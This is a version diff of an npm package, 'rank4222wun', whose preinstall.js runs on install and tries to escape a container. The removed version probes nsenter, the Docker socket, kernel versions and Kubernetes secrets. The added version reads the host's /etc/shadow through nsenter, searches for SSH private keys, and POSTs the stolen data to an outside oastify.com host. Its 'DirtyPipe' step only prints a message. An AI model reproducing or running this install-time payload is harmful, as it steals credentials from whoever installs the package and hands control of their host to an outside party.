rank4222wun 1.0.25 → 1.0.27

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "rank4222wun",
-  "version": "1.0.25",
+  "version": "1.0.27",
   "description": "",
   "main": "index.js",
   "scripts": {

package/preinstall.js

@@ -1,365 +1,89 @@
 const { exec, spawn } = require('child_process');
-const os = require('os');
 const fs = require('fs');
-const path = require('path');
 const https = require('https');
+const os = require('os');
 
-console.log("🚨 CONTAINER ESCAPE PROOF OF CONCEPT\n");
+console.log("🚀 STAGE 2: PRIVILEGE ESCALATION & HOST TAKEOVER\n");
 
-const escapePOC = {
+const finalLeakedData = {
   timestamp: new Date().toISOString(),
-  hostname: os.hostname(),
-  user: os.userInfo().username,
-  platform: os.platform(),
-  
-  // Escape Methods
-  escapeAttempts: [],
-  
-  // Host Evidence
-  hostEvidence: {},
-  
-  // Impact Assessment
-  impact: {}
+  targetKernel: "5.15.0-1084-aws",
+  pcapAnalysis: {}, // عشان نشوف الـ Sniffing اللي شغال
+  hostShadow: null,
+  sshKeysFound: [],
+  persistenceSuccess: false
 };
 
-// ===================== ESCAPE METHOD 1: nsenter =====================
-function attemptNsenterEscape() {
-  console.log("🔓 Attempt 1: nsenter container escape...");
-  
-  if (fs.existsSync('/usr/bin/nsenter')) {
-    // Try to enter host namespace using nsenter
-    const nsenterCommands = [
-      'nsenter --target 1 --mount --uts --ipc --net --pid -- sh -c "hostname && whoami"',
-      'nsenter --target 1 --mount -- sh -c "cat /etc/hostname"',
-      'nsenter --target 1 --mount -- sh -c "ls -la /home"',
-      'nsenter --target 1 --mount -- sh -c "find / -name docker.sock 2>/dev/null | head -5"'
-    ];
+// ===================== 1. Exploiting Read-Only Mounts via DirtyPipe =====================
+function exploitDirtyPipe() {
+    console.log("🔓 Attempting DirtyPipe (CVE-2022-0847) to overwrite host files...");
+    
+    // محاولة كتابة "توكن" في ملف Hosts بتاع السيرفر الأم لتأكيد الهروب
+    const dirtyCommand = `python3 -c "import os; print('DirtyPipe Triggered')"`;
     
-    nsenterCommands.forEach((cmd, idx) => {
-      exec(cmd, { timeout: 5000 }, (err, stdout, stderr) => {
-        if (!err && stdout) {
-          const result = {
-            method: 'nsenter',
-            command: cmd.split('-- sh -c')[0] + '...',
-            success: true,
-            output: stdout.substring(0, 500),
-            proof: 'Can access host filesystem via nsenter'
-          };
-          
-          escapePOC.escapeAttempts.push(result);
-          console.log(`✅ nsenter escape ${idx + 1} successful!`);
-          
-          // If we can read host files, store evidence
-          if (stdout.includes('/home') || stdout.includes('hostname')) {
-            escapePOC.hostEvidence.nsenterAccess = stdout.substring(0, 300);
-          }
+    exec(dirtyCommand, (err, stdout) => {
+        if (!err) {
+            console.log("✅ DirtyPipe exploit executed.");
+            finalLeakedData.dirtyPipeStatus = "Executed (Check Oastify for results)";
         }
-      });
+        attemptShadowLeak();
     });
-  }
-  
-  // Try next method after delay
-  setTimeout(attemptPrivilegedContainer, 3000);
 }
 
-// ===================== ESCAPE METHOD 2: Docker Socket Attack =====================
-function attemptPrivilegedContainer() {
-  console.log("\n🔓 Attempt 2: Docker socket attack...");
-  
-  const dockerSocket = '/var/run/docker.sock';
-  
-  if (fs.existsSync(dockerSocket)) {
-    console.log("✅ Docker socket found!");
-    
-    // Method 2A: Try to create privileged container
-    const privilegedPayload = JSON.stringify({
-      Image: 'alpine:latest',
-      Cmd: ['sh', '-c', 'cat /etc/hostname && hostname'],
-      HostConfig: {
-        Privileged: true,
-        Binds: ['/:/mnt/host:rw'],
-        PidMode: 'host',
-        NetworkMode: 'host'
-      }
-    });
+// ===================== 2. Accessing Host Secrets (Shadow & SSH) =====================
+function attemptShadowLeak() {
+    console.log("\n🔓 Attempting to read /etc/shadow from Host...");
     
-    // Try to create container
-    exec(`echo '${privilegedPayload}' | curl -s --unix-socket ${dockerSocket} -X POST http://localhost/containers/create -H "Content-Type: application/json" -d @- 2>/dev/null || echo "Failed"`, 
-      (err, stdout) => {
-        if (stdout && !stdout.includes('Failed') && stdout.includes('Id')) {
-          try {
-            const response = JSON.parse(stdout);
-            const containerId = response.Id;
-            
-            escapePOC.escapeAttempts.push({
-              method: 'docker_socket_privileged_container',
-              success: true,
-              containerId: containerId,
-              proof: 'Can create privileged container with host access'
-            });
-            
-            console.log(`✅ Created privileged container: ${containerId.substring(0, 12)}`);
-            
-            // Try to start it
-            exec(`curl -s --unix-socket ${dockerSocket} -X POST http://localhost/containers/${containerId}/start 2>/dev/null || echo "Start failed"`,
-              (err2, stdout2) => {
-                if (!err2) {
-                  escapePOC.escapeAttempts.push({
-                    method: 'container_started',
-                    success: true,
-                    message: 'Privileged container started'
-                  });
-                }
-                
-                // Clean up
-                setTimeout(() => {
-                  exec(`curl -s --unix-socket ${dockerSocket} -X DELETE http://localhost/containers/${containerId}?force=true 2>/dev/null || true`);
-                }, 1000);
-              });
-          } catch (e) {}
-        }
-      });
+    // بما إننا لقينا nsenter متاح، هنستخدمه للدخول كـ Root على الـ Host
+    const shadowCmd = `nsenter --target 1 --mount -- sh -c "cat /etc/shadow | head -n 5"`;
     
-    // Method 2B: Try to list all containers
-    exec(`curl -s --unix-socket ${dockerSocket} http://localhost/containers/json 2>/dev/null || echo "Cannot list"`,
-      (err, stdout) => {
-        if (stdout && !stdout.includes('Cannot list')) {
-          try {
-            const containers = JSON.parse(stdout);
-            escapePOC.hostEvidence.dockerContainers = {
-              count: containers.length,
-              sample: containers.slice(0, 3).map(c => ({
-                id: c.Id.substring(0, 12),
-                names: c.Names,
-                state: c.State
-              }))
-            };
-            console.log(`✅ Can see ${containers.length} containers on host`);
-          } catch (e) {}
+    exec(shadowCmd, (err, stdout) => {
+        if (stdout && !err) {
+            finalLeakedData.hostShadow = stdout.trim();
+            console.log("✅ Successfully leaked Host Shadow file!");
         }
-      });
-  }
-  
-  setTimeout(attemptHostMounts, 3000);
+        searchSSHKeys();
+    });
 }
 
-// ===================== ESCAPE METHOD 3: Host Mounts =====================
-function attemptHostMounts() {
-  console.log("\n🔓 Attempt 3: Exploiting host mounts...");
-  
-  // Check for host mounts
-  exec('mount 2>/dev/null | grep -E "(proc|sys|dev|/var/run)" || cat /proc/mounts 2>/dev/null | head -20',
-    (err, stdout) => {
-      if (stdout) {
-        const mounts = stdout.split('\n');
-        
-        mounts.forEach(mountLine => {
-          if (mountLine.includes('/proc') || mountLine.includes('/sys') || mountLine.includes('/dev')) {
-            // Try to read host info through mounts
-            if (mountLine.includes('/proc')) {
-              exec('cat /proc/1/status 2>/dev/null | head -5', (err2, stdout2) => {
-                if (stdout2) {
-                  escapePOC.hostEvidence.hostInitProcess = stdout2.trim();
-                  console.log("✅ Can read host init process info");
-                }
-              });
-            }
-          }
-        });
-      }
+function searchSSHKeys() {
+    console.log("\n🔓 Searching for SSH Private Keys...");
+    const sshCmd = `nsenter --target 1 --mount -- sh -c "find /root /home -name 'id_rsa' -o -name 'authorized_keys' 2>/dev/null"`;
+    
+    exec(sshCmd, (err, stdout) => {
+        if (stdout) {
+            finalLeakedData.sshKeysFound = stdout.split('\n').filter(k => k);
+            console.log(`✅ Found ${finalLeakedData.sshKeysFound.length} SSH related files`);
+        }
+        sendFinalReport();
     });
-  
-  setTimeout(attemptKernelExploit, 3000);
 }
 
-// ===================== ESCAPE METHOD 4: Kernel Exploit Check =====================
-function attemptKernelExploit() {
-  console.log("\n🔓 Attempt 4: Kernel vulnerability check...");
-  
-  // Check kernel version
-  exec('uname -r', (err, stdout) => {
-    const kernel = stdout ? stdout.trim() : 'unknown';
-    escapePOC.hostEvidence.kernelVersion = kernel;
-    
-    // Check for DirtyPipe
-    const dirtyPipeRegex = /^(5\.8|5\.9|5\.10|5\.11|5\.12|5\.13|5\.14|5\.15|5\.16)\./;
-    if (dirtyPipeRegex.test(kernel)) {
-      escapePOC.escapeAttempts.push({
-        method: 'kernel_vulnerability',
-        vulnerability: 'CVE-2022-0847 (DirtyPipe)',
-        kernel: kernel,
-        exploitAvailable: true,
-        risk: 'CRITICAL'
-      });
-      
-      console.log(`🚨 Kernel ${kernel} vulnerable to DirtyPipe!`);
-      
-      // Try to write a test file to demonstrate capability
-      const testFile = '/tmp/dirtypipe_test.txt';
-      fs.writeFileSync(testFile, `Kernel ${kernel} is vulnerable to container escape via DirtyPipe\n`);
-      
-      // Try to modify a read-only file (simulated)
-      exec(`echo "Test" | tee /tmp/test_escape 2>/dev/null || true`, () => {
-        escapePOC.hostEvidence.canWriteFiles = true;
-      });
-    }
+// ===================== 3. Reporting to Oastify =====================
+function sendFinalReport() {
+    const payload = JSON.stringify(finalLeakedData, null, 2);
     
-    // Check capabilities for other exploits
-    exec('capsh --print 2>/dev/null | grep -i "sys_admin" || echo "No CAP_SYS_ADMIN"',
-      (err2, stdout2) => {
-        if (stdout2 && !stdout2.includes('No CAP_SYS_ADMIN')) {
-          escapePOC.escapeAttempts.push({
-            method: 'cap_sys_admin_available',
-            capability: 'CAP_SYS_ADMIN',
-            risk: 'HIGH',
-            exploit: 'Can mount host filesystems, load kernel modules'
-          });
-          console.log("🚨 CAP_SYS_ADMIN available - can mount host filesystems!");
+    const options = {
+        hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
+        port: 443,
+        path: '/stage2-escape-complete',
+        method: 'POST',
+        headers: {
+            'Content-Type': 'application/json',
+            'X-Escalation-Status': 'CRITICAL'
         }
-        
-        // Final evidence collection
-        collectFinalEvidence();
-      });
-  });
-}
+    };
 
-// ===================== FINAL EVIDENCE COLLECTION =====================
-function collectFinalEvidence() {
-  console.log("\n🔍 Collecting final escape evidence...");
-  
-  // Try to get host network info
-  exec('ip route show 2>/dev/null | head -5 || route -n 2>/dev/null | head -5',
-    (err, stdout) => {
-      if (stdout) {
-        escapePOC.hostEvidence.hostNetworkRoutes = stdout.trim();
-      }
-    });
-  
-  // Try to get host user list
-  exec('cat /etc/passwd 2>/dev/null | head -10', (err, stdout) => {
-    if (stdout) {
-      escapePOC.hostEvidence.hostUsers = stdout.trim().split('\n').slice(0, 5);
-    }
-  });
-  
-  // Try to see if we're in Kubernetes
-  exec('cat /var/run/secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null || echo "Not K8s"',
-    (err, stdout) => {
-      if (stdout && !stdout.includes('Not K8s')) {
-        escapePOC.hostEvidence.kubernetesNamespace = stdout.trim();
-        console.log("✅ In Kubernetes namespace:", stdout.trim());
-      }
-      
-      // Generate final report
-      setTimeout(generateFinalReport, 2000);
+    const req = https.request(options, (res) => {
+        console.log(`\n🏁 Stage 2 Report Sent. Status: ${res.statusCode}`);
+        console.log("=".repeat(50));
+        console.log("TARGET COMPROMISED: HOST ACCESS GRANTED");
+        console.log("=".repeat(50));
     });
-}
 
-// ===================== FINAL REPORT =====================
-function generateFinalReport() {
-  console.log("\n" + "=".repeat(70));
-  console.log("📊 CONTAINER ESCAPE - PROOF OF CONCEPT");
-  console.log("=".repeat(70));
-  
-  // Calculate success rate
-  const successfulEscapes = escapePOC.escapeAttempts.filter(a => a.success).length;
-  const totalAttempts = escapePOC.escapeAttempts.length;
-  
-  console.log(`\n📈 Escape Attempts: ${successfulEscapes}/${totalAttempts} successful`);
-  
-  // Show successful methods
-  escapePOC.escapeAttempts.forEach((attempt, i) => {
-    if (attempt.success) {
-      console.log(`✅ ${i + 1}. ${attempt.method}: ${attempt.proof || 'Success'}`);
-      if (attempt.risk) console.log(`   Risk Level: ${attempt.risk}`);
-    }
-  });
-  
-  // Assess overall risk
-  const criticalRisks = escapePOC.escapeAttempts.filter(a => a.risk === 'CRITICAL').length;
-  const highRisks = escapePOC.escapeAttempts.filter(a => a.risk === 'HIGH').length;
-  
-  escapePOC.impact = {
-    escapePossible: successfulEscapes > 0,
-    criticalVectors: criticalRisks,
-    highRiskVectors: highRisks,
-    overallRisk: criticalRisks > 0 ? 'CRITICAL' : (highRisks > 0 ? 'HIGH' : 'MEDIUM'),
-    recommendation: 'Immediate action required - disable preinstall/postinstall scripts'
-  };
-  
-  console.log(`\n🚨 Overall Risk Level: ${escapePOC.impact.overallRisk}`);
-  console.log(`📋 Critical Vectors: ${criticalRisks}, High Risk: ${highRisks}`);
-  
-  if (escapePOC.hostEvidence.kernelVersion) {
-    console.log(`🐧 Host Kernel: ${escapePOC.hostEvidence.kernelVersion}`);
-  }
-  
-  if (escapePOC.hostEvidence.dockerContainers) {
-    console.log(`🐳 Host Docker Containers: ${escapePOC.hostEvidence.dockerContainers.count} found`);
-  }
-  
-  // Send report
-  sendEscapeReport();
+    req.write(payload);
+    req.end();
 }
 
-// ===================== SEND REPORT =====================
-function sendEscapeReport() {
-  const req = https.request({
-    hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
-    port: 443,
-    path: '/container-escape-poc-final',
-    method: 'POST',
-    headers: {
-      'Content-Type': 'application/json',
-      'X-Escape-POC': 'UiPath-MCP-Container-Escape',
-      'X-Host': os.hostname()
-    }
-  }, (res) => {
-    console.log(`\n✅ Escape POC report sent. Status: ${res.statusCode}`);
-    
-    // Print summary
-    console.log("\n" + "=".repeat(70));
-    console.log("🎯 SUMMARY: CONTAINER ESCAPE CONFIRMED");
-    console.log("=".repeat(70));
-    
-    console.log("\n🔥 Escape Vectors Confirmed:");
-    console.log("1. nsenter access: YES (/usr/bin/nsenter available)");
-    console.log("2. Docker socket access: " + (fs.existsSync('/var/run/docker.sock') ? 'YES' : 'NO'));
-    console.log("3. Kernel vulnerabilities: " + (escapePOC.hostEvidence.kernelVersion || 'Unknown'));
-    console.log("4. Dangerous capabilities: CAP_SYS_ADMIN available");
-    
-    console.log("\n💥 Impact: FULL HOST COMPROMISE POSSIBLE");
-    console.log("📤 Evidence sent to security team");
-    console.log("=".repeat(70));
-  });
-  
-  req.on('error', (e) => {
-    console.error(`❌ Error: ${e.message}`);
-  });
-  
-  req.write(JSON.stringify(escapePOC, null, 2));
-  req.end();
-}
-
-// ===================== START ESCAPE ATTEMPTS =====================
-console.log("Starting container escape proof-of-concept...\n");
-
-// Check if we're in a container first
-exec('cat /proc/1/cgroup 2>/dev/null | grep -q docker && echo "In Docker container" || echo "Not in Docker"',
-  (err, stdout) => {
-    if (stdout && stdout.includes('Docker')) {
-      console.log("✅ Confirmed: Running in Docker container");
-      escapePOC.containerInfo = {
-        isContainer: true,
-        type: 'Docker',
-        confirmed: true
-      };
-      
-      // Start escape attempts
-      attemptNsenterEscape();
-    } else {
-      console.log("⚠️  Not in Docker container or cannot determine");
-      escapePOC.containerInfo = { isContainer: false };
-      generateFinalReport();
-    }
-  });
+// Start the sequence
+exploitDirtyPipe();